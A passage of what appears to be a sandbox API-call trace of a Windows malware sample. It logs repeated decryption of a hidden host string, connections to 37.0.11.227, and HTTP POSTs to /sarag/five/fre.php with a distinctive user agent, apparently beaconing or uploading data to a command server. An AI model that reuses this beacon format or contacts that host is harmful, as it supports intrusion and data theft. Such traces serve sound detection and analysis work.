ai_next=0x0)) returned 0 [0339.460] GetProcessHeap () returned 0x690000 [0339.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0339.460] socket (af=2, type=1, protocol=6) returned 0xc2c [0339.461] connect (s=0xc2c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0339.492] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0339.492] GetProcessHeap () returned 0x690000 [0339.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0339.492] GetProcessHeap () returned 0x690000 [0339.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0339.493] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0339.494] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0339.494] GetProcessHeap () returned 0x690000 [0339.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0339.494] GetProcessHeap () returned 0x690000 [0339.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0339.495] GetProcessHeap () returned 0x690000 [0339.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0339.495] GetProcessHeap () returned 0x690000 [0339.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0339.495] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0339.496] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0339.496] GetProcessHeap () returned 0x690000 [0339.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0339.496] GetProcessHeap () returned 0x690000 [0339.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0339.497] send (s=0xc2c, buf=0x6ad508*, len=242, flags=0) returned 242 [0339.503] send (s=0xc2c, buf=0x6aba40*, len=159, flags=0) returned 159 [0339.504] GetProcessHeap () returned 0x690000 [0339.504] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0339.504] recv (in: s=0xc2c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0339.578] GetProcessHeap () returned 0x690000 [0339.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0339.578] GetProcessHeap () returned 0x690000 [0339.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0339.579] GetProcessHeap () returned 0x690000 [0339.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0339.580] GetProcessHeap () returned 0x690000 [0339.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0339.580] closesocket (s=0xc2c) returned 0 [0339.580] GetProcessHeap () returned 0x690000 [0339.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0339.580] GetProcessHeap () returned 0x690000 [0339.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0339.581] GetProcessHeap () returned 0x690000 [0339.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0339.581] GetProcessHeap () returned 0x690000 [0339.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0339.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x197c) returned 0xc2c [0339.583] Sleep (dwMilliseconds=0xea60) [0339.584] GetProcessHeap () returned 0x690000 [0339.584] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0339.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.588] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0339.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.594] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0339.602] GetProcessHeap () returned 0x690000 [0339.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0339.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.603] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0339.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.604] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0339.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.605] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0339.605] GetProcessHeap () returned 0x690000 [0339.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0339.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.651] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0339.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.651] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0339.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.652] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0339.652] GetProcessHeap () returned 0x690000 [0339.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0339.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.653] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0339.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.654] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0339.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.655] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0339.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.656] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0339.656] GetProcessHeap () returned 0x690000 [0339.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0339.656] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0339.656] GetProcessHeap () returned 0x690000 [0339.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0339.656] GetProcessHeap () returned 0x690000 [0339.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0339.657] GetProcessHeap () returned 0x690000 [0339.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0339.657] GetProcessHeap () returned 0x690000 [0339.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0339.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.658] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0339.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0339.677] GetProcessHeap () returned 0x690000 [0339.677] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0339.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.678] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0339.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.679] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0339.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.680] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0339.680] GetProcessHeap () returned 0x690000 [0339.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0339.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.681] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0339.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.682] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0339.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.683] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0339.683] GetProcessHeap () returned 0x690000 [0339.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0339.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.686] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0339.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.687] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0339.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.688] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0339.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.689] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0339.689] GetProcessHeap () returned 0x690000 [0339.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0339.689] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0339.689] GetProcessHeap () returned 0x690000 [0339.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0339.689] socket (af=2, type=1, protocol=6) returned 0xc30 [0339.689] connect (s=0xc30, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0339.713] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0339.713] GetProcessHeap () returned 0x690000 [0339.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0339.713] GetProcessHeap () returned 0x690000 [0339.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0339.714] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0339.714] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0339.714] GetProcessHeap () returned 0x690000 [0339.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0339.714] GetProcessHeap () returned 0x690000 [0339.715] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0339.715] GetProcessHeap () returned 0x690000 [0339.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0339.715] GetProcessHeap () returned 0x690000 [0339.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0339.716] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0339.717] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0339.717] GetProcessHeap () returned 0x690000 [0339.717] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0339.717] GetProcessHeap () returned 0x690000 [0339.717] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0339.717] send (s=0xc30, buf=0x6ad508*, len=242, flags=0) returned 242 [0339.720] send (s=0xc30, buf=0x6aba40*, len=159, flags=0) returned 159 [0339.720] GetProcessHeap () returned 0x690000 [0339.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0339.720] recv (in: s=0xc30, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0339.797] GetProcessHeap () returned 0x690000 [0339.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0339.798] GetProcessHeap () returned 0x690000 [0339.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0339.798] GetProcessHeap () returned 0x690000 [0339.799] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0339.799] GetProcessHeap () returned 0x690000 [0339.799] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0339.799] closesocket (s=0xc30) returned 0 [0339.800] GetProcessHeap () returned 0x690000 [0339.800] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0339.800] GetProcessHeap () returned 0x690000 [0339.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0339.801] GetProcessHeap () returned 0x690000 [0339.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0339.801] GetProcessHeap () returned 0x690000 [0339.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0339.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1980) returned 0xc30 [0339.804] Sleep (dwMilliseconds=0xea60) [0339.807] GetProcessHeap () returned 0x690000 [0339.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0339.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0339.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.817] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0339.836] GetProcessHeap () returned 0x690000 [0339.836] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0339.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.837] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0339.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.841] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0339.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.844] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0339.844] GetProcessHeap () returned 0x690000 [0339.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0339.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.846] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0339.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.855] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0339.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.856] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0339.856] GetProcessHeap () returned 0x690000 [0339.856] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0339.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.857] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0339.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.858] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0339.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.860] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0339.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.861] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0339.861] GetProcessHeap () returned 0x690000 [0339.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0339.861] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0339.862] GetProcessHeap () returned 0x690000 [0339.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0339.863] GetProcessHeap () returned 0x690000 [0339.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0339.863] GetProcessHeap () returned 0x690000 [0339.864] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0339.864] GetProcessHeap () returned 0x690000 [0339.864] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0339.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.865] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0339.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.871] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0339.880] GetProcessHeap () returned 0x690000 [0339.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0339.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.882] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0339.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.883] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0339.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.884] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0339.884] GetProcessHeap () returned 0x690000 [0339.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0339.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.887] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0339.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.888] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0339.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.889] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0339.889] GetProcessHeap () returned 0x690000 [0339.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0339.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.890] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0339.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.892] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0339.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.893] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0339.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.894] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0339.894] GetProcessHeap () returned 0x690000 [0339.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0339.894] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0339.894] GetProcessHeap () returned 0x690000 [0339.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0339.894] socket (af=2, type=1, protocol=6) returned 0xc34 [0339.895] connect (s=0xc34, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0339.917] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0339.917] GetProcessHeap () returned 0x690000 [0339.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0339.917] GetProcessHeap () returned 0x690000 [0339.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0339.920] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0339.922] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; 